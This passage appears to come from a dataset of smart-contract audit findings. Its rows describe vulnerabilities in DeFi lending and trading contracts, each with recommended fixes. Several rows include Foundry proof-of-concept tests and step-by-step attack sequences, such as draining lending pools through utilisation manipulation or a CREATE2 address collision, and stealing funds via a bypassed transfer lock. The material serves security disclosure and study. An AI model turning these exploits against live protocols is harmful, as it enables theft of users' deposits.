This allows for undercollateralized borrows, essentially enabling the protocol to be drained if the attack is performed utilizing several uniswap positions.","```\\n// AccountV1.sol\\n\\nfunction _deposit(\\n address[] memory assetAddresses,\\n uint256[] memory assetIds,\\n uint256[] memory assetAmounts,\\n address from\\n ) internal {\\n // If no Creditor is set, batchProcessDeposit only checks if the assets can be priced.\\n // If a Creditor is set, batchProcessDeposit will also update the exposures of assets and underlying assets for the Creditor.\\n uint256[] memory assetTypes =\\n IRegistry(registry).batchProcessDeposit(creditor, assetAddresses, assetIds, assetAmounts);\\n\\n for (uint256 i; i < assetAddresses.length; ++i) {\\n // Skip if amount is 0 to prevent storing addresses that have 0 balance.\\n if (assetAmounts[i] == 0) continue;\\n\\n if (assetTypes[i] == 0) {\\n if (assetIds[i] != 0) revert AccountErrors.InvalidERC20Id();\\n _depositERC20(from, assetAddresses[i], assetAmounts[i]);\\n } else if (assetTypes[i] == 1) {\\n if (assetAmounts[i] != 1) revert AccountErrors.InvalidERC721Amount();\\n _depositERC721(from, assetAddresses[i], assetIds[i]);\\n } else if (assetTypes[i] == 2) {\\n _depositERC1155(from, assetAddresses[i], assetIds[i], assetAmounts[i]);\\n } else {\\n revert AccountErrors.UnknownAssetType();\\n }\\n }\\n\\n if (erc20Stored.length + erc721Stored.length + erc1155Stored.length > ASSET_LIMIT) {\\n revert AccountErrors.TooManyAssets();\\n }\\n }\\n```\\n" +Stargate `STG` rewards are accounted incorrectly by `StakedStargateAM.sol`,medium,"Stargate LP_STAKING_TIME contract clears and sends rewards to the caller every time `deposit()` is called but StakedStargateAM does not take it into account.\\nWhen either mint() or increaseLiquidity() are called the `assetState[asset].lastRewardGlobal` variable is not reset to `0` even though the rewards have been transferred and accounted for on stargate side.\\nAfter a call to mint() or 
increaseLiquidity() any subsequent call to either mint(), increaseLiquidity(), burn(), decreaseLiquidity(), claimRewards() or rewardOf(), which all internally call _getRewardBalances(), will either revert for underflow or account for less rewards than it should because `assetState_.lastRewardGlobal` has not been correctly reset to `0` but `currentRewardGlobal` (which is fetched from stargate) has:\\n```\\nuint256 currentRewardGlobal = _getCurrentReward(positionState_.asset);\\nuint256 deltaReward = currentRewardGlobal - assetState_.lastRewardGlobal; ❌\\n```\\n\\n```\\nfunction _getCurrentReward(address asset) internal view override returns (uint256 currentReward) {\\n currentReward = LP_STAKING_TIME.pendingEmissionToken(assetToPid[asset], address(this));\\n}\\n```\\n\\nPOC\\nTo copy-paste in USDbCPool.fork.t.sol:\\n```\\nfunction testFork_WrongRewards() public {\\n uint256 initBalance = 1000 * 10 ** USDbC.decimals();\\n // Given : A user deposits in the Stargate USDbC pool, in exchange of an LP token.\\n vm.startPrank(users.accountOwner);\\n deal(address(USDbC), users.accountOwner, initBalance);\\n\\n USDbC.approve(address(router), initBalance);\\n router.addLiquidity(poolId, initBalance, users.accountOwner);\\n // assert(ERC20(address(pool)).balanceOf(users.accountOwner) > 0);\\n\\n // And : The user stakes the LP token via the StargateAssetModule\\n uint256 stakedAmount = ERC20(address(pool)).balanceOf(users.accountOwner);\\n ERC20(address(pool)).approve(address(stakedStargateAM), stakedAmount);\\n uint256 tokenId = stakedStargateAM.mint(address(pool), uint128(stakedAmount) / 4);\\n\\n //We let 10 days pass to accumulate rewards.\\n vm.warp(block.timestamp + 10 days);\\n\\n // User increases liquidity of the position.\\n uint256 initialRewards = stakedStargateAM.rewardOf(tokenId);\\n stakedStargateAM.increaseLiquidity(tokenId, 1);\\n\\n vm.expectRevert();\\n stakedStargateAM.burn(tokenId); //❌ User can't call burn because of underflow\\n\\n //We let 10 days pass, 
this accumulates enough rewards for the call to burn to succeed\\n vm.warp(block.timestamp + 10 days);\\n uint256 currentRewards = stakedStargateAM.rewardOf(tokenId);\\n stakedStargateAM.burn(tokenId);\\n\\n assert(currentRewards - initialRewards < 1e10); //❌ User gets less rewards than he should. The rewards of the 10 days the user couldn't withdraw his position are basically zeroed out.\\n vm.stopPrank();\\n}\\n```\\n","Adjust the `assetState[asset].lastRewardGlobal` correctly or since every action (mint(), `burn()`, `increaseLiquidity()`, `decreaseliquidity()`, claimReward()) will have the effect of withdrawing all the current rewards it's possible to change the function _getRewardBalances() to use the amount returned by _getCurrentReward() as the `deltaReward` directly:\\n```\\nuint256 deltaReward = _getCurrentReward(positionState_.asset);\\n```\\n","Users will not be able to take any action on their positions until `currentRewardGlobal` is greater or equal to `assetState_.lastRewardGlobal`. After that they will be able to perform actions but their position will account for less rewards than it should because a total amount of `assetState_.lastRewardGlobal` rewards is nullified.\\nThis will also DOS the whole lending/borrowing system if an Arcadia Stargate position is used as collateral because rewardOf(), which is called to estimate the collateral value, also reverts.",```\\nuint256 currentRewardGlobal = _getCurrentReward(positionState_.asset);\\nuint256 deltaReward = currentRewardGlobal - assetState_.lastRewardGlobal; ❌\\n```\\n +`CREATE2` address collision against an Account will allow complete draining of lending pools,medium,"The factory function `createAccount()` creates a new account contract for the user using `CREATE2`. We show that a meet-in-the-middle attack at finding an address collision against an undeployed account is possible. 
Furthermore, such an attack allows draining of all funds from the lending pool.\\nThe attack consists of two parts: Finding a collision, and actually draining the lending pool. We describe both here:\\nPoC: Finding a collision\\nNote that in `createAccount`, `CREATE2` salt is user-supplied, and `tx.origin` is technically also user-supplied:\\n```\\naccount = address(\\n new Proxy{ salt: keccak256(abi.encodePacked(salt, tx.origin)) }(\\n versionInformation[accountVersion].implementation\\n )\\n);\\n```\\n\\nThe address collision an attacker will need to find are:\\nOne undeployed Arcadia account address (1).\\nArbitrary attacker-controlled wallet contract (2).\\nBoth sets of addresses can be brute-force searched because:\\nAs shown above, `salt` is a user-supplied parameter. By brute-forcing many `salt` values, we have obtained many different (undeployed) wallet accounts for (1).\\n(2) can be searched the same way. The contract just has to be deployed using `CREATE2`, and the `salt` is in the attacker's control by definition.\\nAn attacker can find any single address collision between (1) and (2) with high probability of success using the following meet-in-the-middle technique, a classic brute-force-based attack in cryptography:\\nBrute-force a sufficient number of values of salt ($2^{80}$), pre-compute the resulting account addresses, and efficiently store them e.g. in a Bloom filter data structure.\\nBrute-force contract pre-computation to find a collision with any address within the stored set in step 1.\\nThe feasibility, as well as detailed technique and hardware requirements of finding a collision, are sufficiently described in multiple references:\\n1: A past issue on Sherlock describing this attack.\\n2: EIP-3607, which rationale is this exact attack. 
The EIP is in final state.\\n3: A blog post discussing the cost (money and time) of this exact attack.\\nThe hashrate of the BTC network has reached $6 \\times 10^{20}$ hashes per second as of time of writing, taking only just $33$ minutes to achieve $2^{80}$ hashes. A fraction of this computing power will still easily find a collision in a reasonably short timeline.\\nPoC: Draining the lending pool\\nEven given EIP-3607 which disables an EOA if a contract is already deployed on top, we show that it's still possible to drain the lending pool entirely given a contract collision.\\nAssuming the attacker has already found an address collision against an undeployed account, let's say `0xCOLLIDED`. The steps for complete draining of a lending pool are as follow:\\nFirst tx:\\nDeploy the attack contract onto address `0xCOLLIDED`.\\nSet infinite allowance for {0xCOLLIDED ---> attacker wallet} for any token they want.\\nDestroy the contract using `selfdestruct`.\\nPost Dencun hardfork, `selfdestruct` is still possible if the contract was created in the same transaction. The only catch is that all 3 of these steps must be done in one tx.\\nThe attacker now has complete control of any funds sent to `0xCOLLIDED`.\\nSecond tx:\\nDeploy an account to `0xCOLLIDED`.\\nDeposit an asset, collateralize it, then drain the collateral using the allowance set in tx1.\\nRepeat step 2 for as long as they need to (i.e. collateralize the same asset multiple times).\\nThe account at `0xCOLLIDED` is now infinitely collateralized.\\nFunds for step 2 and 3 can be obtained through external flash loan. Simply return the funds when this step is finished.\\nAn infinitely collateralized account has infinite borrow power. 
Simply borrow all the funds from the lending pool and run away with it, leaving an infinity collateral account that actually holds no funds.\\nThe attacker has stolen all funds from the lending pool.\\nCoded unit-PoC\\nWhile we cannot provide an actual hash collision due to infrastructural constraints, we are able to provide a coded PoC to prove the following two properties of the EVM that would enable this attack:\\nA contract can be deployed on top of an address that already had a contract before.\\nBy deploying a contract and self-destruct in the same tx, we are able to set allowance for an address that has no bytecode.\\nHere is the PoC, as well as detailed steps to recreate it:\\nThe provided PoC has been tested on Remix IDE, on the Remix VM - Mainnet fork environment, as well as testing locally on the Holesky testnet fork, which as of time of writing, has been upgraded with the Dencun hardfork.","The mitigation method is to prevent controlling over the deployed account address (or at least severely limit that). Some techniques may be:\\nDo not allow a user-supplied `salt`, as well as do not use the user address as a determining factor for the `salt`.\\nUse the vanilla contract creation with `CREATE`, as opposed to `CREATE2`. The contract's address is determined by `msg.sender` (the factory), and the internal `nonce` of the factory (for a contract, this is just ""how many other contracts it has deployed"" plus one).\\nThis will prevent brute-forcing of one side of the collision, disabling the $O(2^{81})$ search technique.","Complete draining of a lending pool if an address collision is found.\\nWith the advancement of computing hardware, the cost of an attack has been shown to be just a few million dollars, and that the current Bitcoin network hashrate allows about $2^{80}$ in about half an hour. 
The cost of the attack may be offset with longer brute force time.\\nFor a DeFi lending pool, it is normal for a pool TVL to reach tens or hundreds of millions in USD value (top protocols' TVL are well above the billions). It is then easy to show that such an attack is massively profitable.","```\\naccount = address(\\n new Proxy{ salt: keccak256(abi.encodePacked(salt, tx.origin)) }(\\n versionInformation[accountVersion].implementation\\n )\\n);\\n```\\n" +Utilisation Can Be Manipulated Far Above 100%,medium,"The utilisation of the protocol can be manipulated far above 100% via token donation. It is easiest to set this up on an empty pool. This can be used to manipulate the interest to above 10000% per minute to steal from future depositors.\\nThe utilisation is basically assets_borrowed / assets_loaned. A higher utilisation creates a higher interest rate. This is assumed to be less than 100%. However if it exceeds 100%, there is no cap here:\\nNormally, assets borrowed should never exceed assets loaned, however this is possible in Arcadia as the only thing stopping a borrow exceeding loans is that the `transfer` of tokens will revert due to not enough tokens in the `Lending pool`. However, an attacker can make it not revert by simply sending tokens directly into the lending pool. For example using the following sequence:\\ndeposit 100 assets into tranche\\nUse ERC20 Transfer to transfer `1e18` assets into the `LendingPool`\\nBorrow the `1e18` assets\\nThese are the first steps of the coded POC at the bottom of this issue. It uses a token donation to make a borrow which is far larger than the loan amount.\\nIn the utilisation calculation, this results in an incredibly high utilisation rate and thus interest rate as it is not capped at 100%. This is why some protocols implement a hardcap of utilisation at 100%.\\nThe interest rate is so high that over 2 minutes, 100 assets grows to over 100000 assets, or a 100000% interest over 2 minutes. 
The linked similar exploit on Silo Finance has an even more drastic interest manipulation which could drain the whole protocol in a block. However I did not optimise the numbers for this POC.\\nNote that the 1e18 assets ""donated"" to the protocol are not lost. They can simply be all borrowed into an attackers account.\\nThe attacker can set this up when the initial lending pool is empty. Then, they can steal assets from subsequent depositors due to the huge amount of interest collected from their small initial deposit\\nLet me sum up the attack in the POC:\\ndeposit 100 assets into tranche\\nUse ERC20 Transfer to transfer `1e18` assets into the `LendingPool`\\nBorrow the `1e18` assets\\nVictim deposits into tranche\\nAttacker withdraws the victims funds which is greater than the 100 assets the attacker initially deposited\\nHere is the output from the console.logs:\\n```\\nRunning 1 test for test/scenario/BorrowAndRepay.scenario.t.sol:BorrowAndRepay_Scenario_Test\\n[PASS] testScenario_Poc() (gas: 799155)\\nLogs:\\n 100 initial pool balance. This is also the amount deposited into tranche\\n warp 2 minutes into future\\n mint was used rather than deposit to ensure no rounding error. This a UTILISATION manipulation attack not a share inflation attack\\n 22 shares were burned in exchange for 100000 assets. 
Users.LiquidityProvider only deposited 100 asset in the tranche but withdrew 100000 assets!\\n```\\n\\nThis is the edited version of `setUp()` in `_scenario.t.sol`\\n```\\nfunction setUp() public virtual override(Fuzz_Lending_Test) {\\n Fuzz_Lending_Test.setUp();\\n deployArcadiaLendingWithAccounts();\\n\\n vm.prank(users.creatorAddress);\\n pool.addTranche(address(tranche), 50);\\n\\n // Deposit funds in the pool.\\n deal(address(mockERC20.stable1), users.liquidityProvider, type(uint128).max, true);\\n\\n vm.startPrank(users.liquidityProvider);\\n mockERC20.stable1.approve(address(pool), 100);\\n //only 1 asset was minted to the liquidity provider\\n tranche.mint(100, users.liquidityProvider);\\n vm.stopPrank();\\n\\n vm.startPrank(users.creatorAddress);\\n pool.setAccountVersion(1, true);\\n pool.setInterestParameters(\\n Constants.interestRate, Constants.interestRate, Constants.interestRate, Constants.utilisationThreshold\\n );\\n vm.stopPrank();\\n\\n vm.prank(users.accountOwner);\\n proxyAccount.openMarginAccount(address(pool));\\n }\\n```\\n\\nThis test was added to `BorrowAndRepay.scenario.t.sol`\\n```\\n function testScenario_Poc() public {\\n\\n uint poolBalance = mockERC20.stable1.balanceOf(address(pool));\\n console.log(poolBalance, ""initial pool balance. 
This is also the amount deposited into tranche"");\\n vm.startPrank(users.liquidityProvider);\\n mockERC20.stable1.approve(address(pool), 1e18);\\n mockERC20.stable1.transfer(address(pool),1e18);\\n vm.stopPrank();\\n\\n // Given: collateralValue is smaller than maxExposure.\\n //amount token up to max\\n uint112 amountToken = 1e30;\\n uint128 amountCredit = 1e10;\\n\\n //get the collateral factor\\n uint16 collFactor_ = Constants.tokenToStableCollFactor;\\n uint256 valueOfOneToken = (Constants.WAD * rates.token1ToUsd) / 10 ** Constants.tokenOracleDecimals;\\n\\n //deposits token1 into proxyAccount\\n depositTokenInAccount(proxyAccount, mockERC20.token1, amountToken);\\n\\n uint256 maxCredit = (\\n //amount credit is capped based on amount Token\\n (valueOfOneToken * amountToken) / 10 ** Constants.tokenDecimals * collFactor_ / AssetValuationLib.ONE_4\\n / 10 ** (18 - Constants.stableDecimals)\\n );\\n\\n\\n vm.startPrank(users.accountOwner);\\n //borrow the amountCredit to the proxy account\\n pool.borrow(amountCredit, address(proxyAccount), users.accountOwner, emptyBytes3);\\n vm.stopPrank();\\n\\n assertEq(mockERC20.stable1.balanceOf(users.accountOwner), amountCredit);\\n\\n //warp 2 minutes into the future.\\n vm.roll(block.number + 10);\\n vm.warp(block.timestamp + 120);\\n\\n console.log(""warp 2 minutes into future"");\\n\\n address victim = address(123);\\n deal(address(mockERC20.stable1), victim, type(uint128).max, true);\\n\\n vm.startPrank(victim);\\n mockERC20.stable1.approve(address(pool), type(uint128).max);\\n uint shares = tranche.mint(1e3, victim);\\n vm.stopPrank();\\n\\n console.log(""mint was used rather than deposit to ensure no rounding error. 
This a UTILISATION manipulation attack not a share inflation attack"");\\n\\n //function withdraw(uint256 assets, address receiver, address owner_)\\n\\n //WITHDRAWN 1e5\\n vm.startPrank(users.liquidityProvider);\\n uint withdrawShares = tranche.withdraw(1e5, users.liquidityProvider,users.liquidityProvider);\\n vm.stopPrank();\\n\\n console.log(withdrawShares, ""shares were burned in exchange for 100000 assets. Users.LiquidityProvider only deposited 100 asset in the tranche but withdrew 100000 assets!"");\\n\\n\\n }\\n```\\n",Add a utilisation cap of 100%. Many other lending protocols implement this mitigation.,An early depositor can steal funds from future depositors through utilisation/interest rate manipulation.,```\\nRunning 1 test for test/scenario/BorrowAndRepay.scenario.t.sol:BorrowAndRepay_Scenario_Test\\n[PASS] testScenario_Poc() (gas: 799155)\\nLogs:\\n 100 initial pool balance. This is also the amount deposited into tranche\\n warp 2 minutes into future\\n mint was used rather than deposit to ensure no rounding error. This a UTILISATION manipulation attack not a share inflation attack\\n 22 shares were burned in exchange for 100000 assets. Users.LiquidityProvider only deposited 100 asset in the tranche but withdrew 100000 assets!\\n```\\n +`LendingPool#flashAction` is broken when trying to refinance position across `LendingPools` due to improper access control,medium,"When refinancing an account, `LendingPool#flashAction` is used to facilitate the transfer. However due to access restrictions on `updateActionTimestampByCreditor`, the call made from the new creditor will revert, blocking any account transfers. 
This completely breaks refinancing across lenders which is a core functionality of the protocol.\\nLendingPool.sol#L564-L579\\n```\\nIAccount(account).updateActionTimestampByCreditor();\\n\\nasset.safeTransfer(actionTarget, amountBorrowed);\\n\\n{\\n uint256 accountVersion = IAccount(account).flashActionByCreditor(actionTarget, actionData);\\n if (!isValidVersion[accountVersion]) revert LendingPoolErrors.InvalidVersion();\\n}\\n```\\n\\nWe see above that `account#updateActionTimestampByCreditor` is called before `flashActionByCreditor`.\\nAccountV1.sol#L671\\n```\\nfunction updateActionTimestampByCreditor() external onlyCreditor updateActionTimestamp { }\\n```\\n\\nWhen we look at this function, it can only be called by the current creditor. When refinancing a position, this function is actually called by the pending creditor since the `flashaction` should originate from there. This will cause the call to revert, making it impossible to refinance across `lendingPools`.",`Account#updateActionTimestampByCreditor()` should be callable by BOTH the current and pending creditor,Refinancing is impossible,"```\\nIAccount(account).updateActionTimestampByCreditor();\\n\\nasset.safeTransfer(actionTarget, amountBorrowed);\\n\\n{\\n uint256 accountVersion = IAccount(account).flashActionByCreditor(actionTarget, actionData);\\n if (!isValidVersion[accountVersion]) revert LendingPoolErrors.InvalidVersion();\\n}\\n```\\n" +Malicious keepers can manipulate the price when executing an order,high,"Malicious keepers can manipulate the price when executing an order by selecting a price in favor of either the LPs or long traders, leading to a loss of assets to the victim's party.\\nWhen the keeper executes an order, it was understood from the protocol team that the protocol expects that the keeper must also update the Pyth price to the latest one available off-chain. 
In addition, the contest page mentioned that ""an offchain price that is pulled by the keeper and pushed onchain at time of any order execution"".\\nThis requirement must be enforced to ensure that the latest price is always used.\\n```\\nFile: DelayedOrder.sol\\n function executeOrder(\\n address account,\\n bytes[] calldata priceUpdateData\\n )\\n external\\n payable\\n nonReentrant\\n whenNotPaused\\n updatePythPrice(vault, msg.sender, priceUpdateData)\\n orderInvariantChecks(vault)\\n {\\n // Settle funding fees before executing any order.\\n // This is to avoid error related to max caps or max skew reached when the market has been skewed to one side for a long time.\\n // This is more important in case the we allow for limit orders in the future.\\n vault.settleFundingFees();\\n..SNIP..\\n }\\n```\\n\\nHowever, this requirement can be bypassed by malicious keepers. A keeper could skip or avoid the updating of the Pyth price by passing in an empty `priceUpdateData` array, which will pass the empty array to the `OracleModule.updatePythPrice` function.\\n```\\nFile: OracleModifiers.sol\\n /// @dev Important to use this modifier in functions which require the Pyth network price to be updated.\\n /// Otherwise, the invariant checks or any other logic which depends on the Pyth network price may not be correct.\\n modifier updatePythPrice(\\n IFlatcoinVault vault,\\n address sender,\\n bytes[] calldata priceUpdateData\\n ) {\\n IOracleModule(vault.moduleAddress(FlatcoinModuleKeys._ORACLE_MODULE_KEY)).updatePythPrice{value: msg.value}(\\n sender,\\n priceUpdateData\\n );\\n _;\\n }\\n```\\n\\nWhen the Pyth's `Pyth.updatePriceFeeds` function is executed, the `updateData` parameter will be set to an empty array.\\n```\\nFile: OracleModule.sol\\n function updatePythPrice(address sender, bytes[] calldata priceUpdateData) external payable nonReentrant {\\n // Get fee amount to pay to Pyth\\n uint256 fee = offchainOracle.oracleContract.getUpdateFee(priceUpdateData);\\n\\n 
// Update the price data (and pay the fee)\\n offchainOracle.oracleContract.updatePriceFeeds{value: fee}(priceUpdateData);\\n\\n if (msg.value - fee > 0) {\\n // Need to refund caller. Try to return unused value, or revert if failed\\n (bool success, ) = sender.call{value: msg.value - fee}("""");\\n if (success == false) revert FlatcoinErrors.RefundFailed();\\n }\\n }\\n```\\n\\nInspecting the source code of Pyth's on-chain contract, the `Pyth.updatePriceFeeds` function will not perform any update since the `updateData.length` will be zero in this instance.\\n```\\nfunction updatePriceFeeds(\\n bytes[] calldata updateData\\n) public payable override {\\n uint totalNumUpdates = 0;\\n for (uint i = 0; i < updateData.length; ) {\\n if (\\n updateData[i].length > 4 &&\\n UnsafeCalldataBytesLib.toUint32(updateData[i], 0) ==\\n ACCUMULATOR_MAGIC\\n ) {\\n totalNumUpdates += updatePriceInfosFromAccumulatorUpdate(\\n updateData[i]\\n );\\n } else {\\n updatePriceBatchFromVm(updateData[i]);\\n totalNumUpdates += 1;\\n }\\n\\n unchecked {\\n i++;\\n }\\n }\\n uint requiredFee = getTotalFee(totalNumUpdates);\\n if (msg.value < requiredFee) revert PythErrors.InsufficientFee();\\n}\\n```\\n\\nThe keeper is permissionless, thus anyone can be a keeper and execute order on the protocol. If this requirement is not enforced, keepers who might also be LPs (or collude with LPs) can choose whether to update the Pyth price to the latest price or not, depending on whether the updated price is in favor of the LPs. For instance, if the existing on-chain price ($1000 per ETH) is higher than the latest off-chain price ($950 per ETH), malicious keepers will use the higher price of $1000 to open the trader's long position so that its position's entry price will be set to a higher price of $1000. When the latest price of $950 gets updated, the longer position will immediately incur a loss of $50. 
Since this is a zero-sum game, long traders' loss is LPs' gain.\\nNote that per the current design, when the open long position order is executed at $T2$, any price data with a timestamp between $T1$ and $T2$ is considered valid and can be used within the `executeOpen` function to execute an open order. Thus, when the malicious keeper uses an up-to-date price stored in Pyth's on-chain contract, it will not revert as long as its timestamp is on or after $T1$.\\n\\nAlternatively, it is also possible for the opposite scenario to happen where the keepers favor the long traders and choose to use a lower older price on-chain to execute the order instead of using the latest higher price. As such, the long trader's position will be immediately profitable after the price update. In this case, the LPs are on the losing end.\\nSidenote: The oracle's `maxDiffPercent` check will not guard against this attack effectively. For instance, in the above example, if the Chainlink price is $975 and the `maxDiffPercent` is 5%, the Pyth price of $950 or $1000 still falls within the acceptable range. If the `maxDiffPercent` is reduced to a smaller margin, it will potentially lead to a more serious issue where all the transactions get reverted when fetching the price, breaking the entire protocol.","Ensure that the keepers must update the Pyth price when executing an order. 
Perform additional checks against the `priceUpdateData` submitted by the keepers to ensure that it is not empty and `priceId` within the `PriceInfo` matches the price ID of the collateral (rETH), so as to prevent malicious keeper from bypassing the price update by passing in an empty array or price update data that is not mapped to the collateral (rETH).",Loss of assets as shown in the scenario above.,"```\\nFile: DelayedOrder.sol\\n function executeOrder(\\n address account,\\n bytes[] calldata priceUpdateData\\n )\\n external\\n payable\\n nonReentrant\\n whenNotPaused\\n updatePythPrice(vault, msg.sender, priceUpdateData)\\n orderInvariantChecks(vault)\\n {\\n // Settle funding fees before executing any order.\\n // This is to avoid error related to max caps or max skew reached when the market has been skewed to one side for a long time.\\n // This is more important in case the we allow for limit orders in the future.\\n vault.settleFundingFees();\\n..SNIP..\\n }\\n```\\n" +Losses of some long traders can eat into the margins of others,medium,"The losses of some long traders can eat into the margins of others, resulting in those affected long traders being unable to withdraw their margin and profits, leading to a loss of assets for the long traders.\\nAt $T0$, the current price of ETH is $1000 and assume the following state:\\nAlice's Long Position 1 Bob's Long Position 2 Charles (LP)\\nPosition Size = 6 ETH\\nMargin = 3 ETH\\nLast Price (entry price) = $1000 Position Size = 6 ETH\\nMargin = 5 ETH\\nLast Price (entry price) = $1000 Deposited 12 ETH\\nThe `stableCollateralTotal` will be 12 ETH\\nThe `GlobalPositions.marginDepositedTotal` will be 8 ETH (3 + 5)\\nThe `globalPosition.sizeOpenedTotal` will be 12 ETH (6 + 6)\\nThe total balance of ETH in the vault is 20 ETH.\\nAs this is a perfectly hedged market, the accrued fee will be zero, and ignored in this report for simplicity's sake.\\nAt $T1$, the price of the ETH drops from $1000 to $600. 
At this point, the settled margin of both long positions will be as follows:\\nAlice's Long Position 1 Bob's Long Position 2\\npriceShift = Current Price - Last Price = $600 - $1000 = -$400\\nPnL = (Position Size * priceShift) / Current Price = (6 ETH * -$400) / $600 = -4 ETH\\nsettleMargin = marginDeposited + PnL = 3 ETH + (-4 ETH) = -1 ETH PnL = -4 ETH (Same calculation)\\nsettleMargin = marginDeposited + PnL = 5 ETH + (-4 ETH) = 1 ETH\\nAlice's long position is underwater (settleMargin < 0), so it can be liquidated. When the liquidation is triggered, it will internally call the `updateGlobalPositionData` function. Even if the liquidation does not occur, any of the following actions will also trigger the `updateGlobalPositionData` function internally:\\nexecuteOpen\\nexecuteAdjust\\nexecuteClose\\nThe purpose of the `updateGlobalPositionData` function is to update the global position data. This includes getting the total profit loss of all long traders (Alice & Bob), and updating the margin deposited total + stable collateral total accordingly.\\nAssume that the `updateGlobalPositionData` function is triggered by one of the above-mentioned functions. Line 179 below will compute the total PnL of all the opened long positions.\\n```\\npriceShift = current price - last price\\npriceShift = $600 - $1000 = -$400\\n\\nprofitLossTotal = (globalPosition.sizeOpenedTotal * priceShift) / current price\\nprofitLossTotal = (12 ETH * -$400) / $600\\nprofitLossTotal = -8 ETH\\n```\\n\\nThe `profitLossTotal` is -8 ETH. 
This is aligned with what we have calculated earlier, where Alice's PnL is -4 ETH and Bob's PnL is -4 ETH (total = -8 ETH loss).\\nAt Line 184 below, the `newMarginDepositedTotal` will be set to as follows (ignoring the `_marginDelta` for simplicity's sake)\\n```\\nnewMarginDepositedTotal = _globalPositions.marginDepositedTotal + _marginDelta + profitLossTotal\\nnewMarginDepositedTotal = 8 ETH + 0 + (-8 ETH) = 0 ETH\\n```\\n\\nWhat happened above is that 8 ETH collateral is deducted from the long traders and transferred to LP. When `newMarginDepositedTotal` is zero, this means that the long trader no longer owns any collateral. This is incorrect, as Bob's position should still contribute 1 ETH remaining margin to the long trader's pool.\\nLet's review Alice's Long Position 1: Her position's settled margin is -1 ETH. When the settled margin is -ve then the LPs have to bear the cost of loss per the comment here. However, in this case, we can see that it is Bob (long trader) instead of LPs who are bearing the cost of Alice's loss, which is incorrect.\\nLet's review Bob's Long Position 2: His position's settled margin is 1 ETH. If his position's liquidation margin is $LM$, Bob should be able to withdraw $1\\ ETH - LM$ of his position's margin. 
However, in this case, the `marginDepositedTotal` is already zero, so there is no more collateral left on the long trader pool for Bob to withdraw, which is incorrect.\\nWith the current implementation, the losses of some long traders can eat into the margins of others, resulting in those affected long traders being unable to withdraw their margin and profits.\\n```\\nbeing File: FlatcoinVault.sol\\n function updateGlobalPositionData(\\n uint256 _price,\\n int256 _marginDelta,\\n int256 _additionalSizeDelta\\n ) external onlyAuthorizedModule {\\n // Get the total profit loss and update the margin deposited total.\\n int256 profitLossTotal = PerpMath._profitLossTotal({globalPosition: _globalPositions, price: _price});\\n\\n // Note that technically, even the funding fees should be accounted for when computing the margin deposited total.\\n // However, since the funding fees are settled at the same time as the global position data is updated,\\n // we can ignore the funding fees here.\\n int256 newMarginDepositedTotal = int256(_globalPositions.marginDepositedTotal) + _marginDelta + profitLossTotal;\\n\\n // Check that the sum of margin of all the leverage traders is not negative.\\n // Rounding errors shouldn't result in a negative margin deposited total given that\\n // we are rounding down the profit loss of the position.\\n // If anything, after closing the last position in the system, the `marginDepositedTotal` should can be positive.\\n // The margin may be negative if liquidations are not happening in a timely manner.\\n if (newMarginDepositedTotal < 0) {\\n revert FlatcoinErrors.InsufficientGlobalMargin();\\n }\\n\\n _globalPositions = FlatcoinStructs.GlobalPositions({\\n marginDepositedTotal: uint256(newMarginDepositedTotal),\\n sizeOpenedTotal: (int256(_globalPositions.sizeOpenedTotal) + _additionalSizeDelta).toUint256(),\\n lastPrice: _price\\n });\\n\\n // Profit loss of leverage traders has to be accounted for by adjusting the stable collateral total.\\n 
// Note that technically, even the funding fees should be accounted for when computing the stable collateral total.\\n // However, since the funding fees are settled at the same time as the global position data is updated,\\n // we can ignore the funding fees here\\n _updateStableCollateralTotal(-profitLossTotal);\\n }\\n```\\n","The following are the two issues identified earlier and the recommended fixes:\\nIssue 1\\nLet's review Alice's Long Position 1: Her position's settled margin is -1 ETH. When the settled margin is -ve then the LPs have to bear the cost of loss per the comment here. However, in this case, we can see that it is Bob (long trader) instead of LPs who are bearing the cost of Alice's loss, which is incorrect.\\nFix: Alice -1 ETH loss should be borne by the LP, not the long traders. The stable collateral total of LP should be deducted by 1 ETH to bear the cost of the loss.\\nIssue 2\\nLet's review Bob's Long Position 2: His position's settled margin is 1 ETH. If his position's liquidation margin is $LM$, Bob should be able to withdraw $1\\ ETH - LM$ of his position's margin. However, in this case, the `marginDepositedTotal` is already zero, so there is no more collateral left on the long trader pool for Bob to withdraw, which is incorrect.\\nFix: Bob should be able to withdraw $1\\ ETH - LM$ of his position's margin regardless of the PnL of other long traders. 
Bob's margin should be isolated from Alice's loss.","Loss of assets for the long traders as the losses of some long traders can eat into the margins of others, resulting in those affected long traders being unable to withdraw their margin and profits.",```\\npriceShift = current price - last price\\npriceShift = $600 - $1000 = -$400\\n\\nprofitLossTotal = (globalPosition.sizeOpenedTotal * priceShift) / current price\\nprofitLossTotal = (12 ETH * -$400) / $600\\nprofitLossTotal = -8 ETH\\n```\\n +The transfer lock for leveraged position orders can be bypassed,high,"The leveraged positions can be closed either through `DelayedOrder` or through the `LimitOrder`. Once the order is announced via `DelayedOrder.announceLeverageClose` or `LimitOrder.announceLimitOrder` function the LeverageModule's `lock` function is called to prevent given token to be transferred. This mechanism can be bypassed and it is possible to unlock the token transfer while having order announced.\\nExploitation scenario:\\nAttacker announces leverage close order for his position via `announceLeverageClose` of `DelayedOrder` contract.\\nAttacker announces limit order via `announceLimitOrder` of `LimitOrder` contract.\\nAttacker cancels limit order via `cancelLimitOrder` of `LimitOrder` contract.\\nThe position is getting unlocked while the leverage close announcement is active.\\nAttacker sells the leveraged position to a third party.\\nAttacker executes the leverage close via `executeOrder` of `DelayedOrder` contract and gets the underlying collateral stealing the funds from the third party that the leveraged position was sold to.\\nFollowing proof of concept presents the attack:\\n```\\nfunction testExploitTransferOut() public {\\n uint256 collateralPrice = 1000e8;\\n\\n vm.startPrank(alice);\\n\\n uint256 balance = WETH.balanceOf(alice);\\n console2.log(""alice balance"", balance);\\n \\n (uint256 minFillPrice, ) = oracleModProxy.getPrice();\\n\\n // Announce order through delayed orders to lock 
